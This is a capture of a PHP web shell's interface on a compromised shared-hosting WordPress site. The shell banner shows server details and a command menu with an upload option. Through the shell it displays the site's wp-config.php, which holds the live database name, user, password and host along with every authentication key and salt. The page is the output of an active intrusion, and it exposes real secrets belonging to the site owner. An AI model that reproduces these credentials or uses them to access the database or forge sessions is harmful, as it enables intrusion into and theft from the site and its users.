|
Server IP : 10.128.40.6 / Your IP : 216.73.216.233 Web Server : Apache System : Linux webd006.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : logmcpe ( 111175) PHP Version : 7.3.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/logmcpe/www/TEST/www/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'logmcpemail' );
/** MySQL database username */
define( 'DB_USER', 'logmcpemail' );
/** MySQL database password */
define( 'DB_PASSWORD', 'Tmcpro040' );
/** MySQL hostname */
define( 'DB_HOST', 'logmcpemail.mysql.db' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '%gzWP@x!^M,2z%MCf&P~nB,O3:qdur(*5LNc%qFQg;?-}fEhulM0PFtbCT8xj_nS' );
define( 'SECURE_AUTH_KEY', ')Cp_U(KlWeD^-YPZ{ n@%Ba8HNi6j0<sO=KZe6f8Aew;W%kL{Wy83Yb#It;L@6!6' );
define( 'LOGGED_IN_KEY', '2>DH>vRn@A0Vx4p3+C0V FumA ?F3-&)qga{rWyK8~*og6LT5NGGCBqX-9B/gQ6e' );
define( 'NONCE_KEY', '=Bl?B0}[_3h36?bEO6Wv(2{fFhAXD$hp>|Tw3ohT,wvnYv&YjkHNvm} ~nU,/i,B' );
define( 'AUTH_SALT', 'b qRa!!jomSbYn}k51GuQEavS>f-&$%*9xX{|?7T9^5DYDz=P`d+?mN-@/brzPou' );
define( 'SECURE_AUTH_SALT', 'wkz8>/c`Z8Q_L.zT%NkD7coj(cdi0+US(f,L}O5l0%8(mn)roS4(&:V?}T.-8aAB' );
define( 'LOGGED_IN_SALT', ' VfX?=/|N#YR{ko2k[Xe[WK5e_UmUyiaJa348#?p+ZpDp%V1@IJo?^~0v$]Ii]+Z' );
define( 'NONCE_SALT', '..6)kliHIi])XMuk+:Kc`;_abLE ?A{U8ym/)^.LCc9YGb5nt%q}2or$>Y~%63-?' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
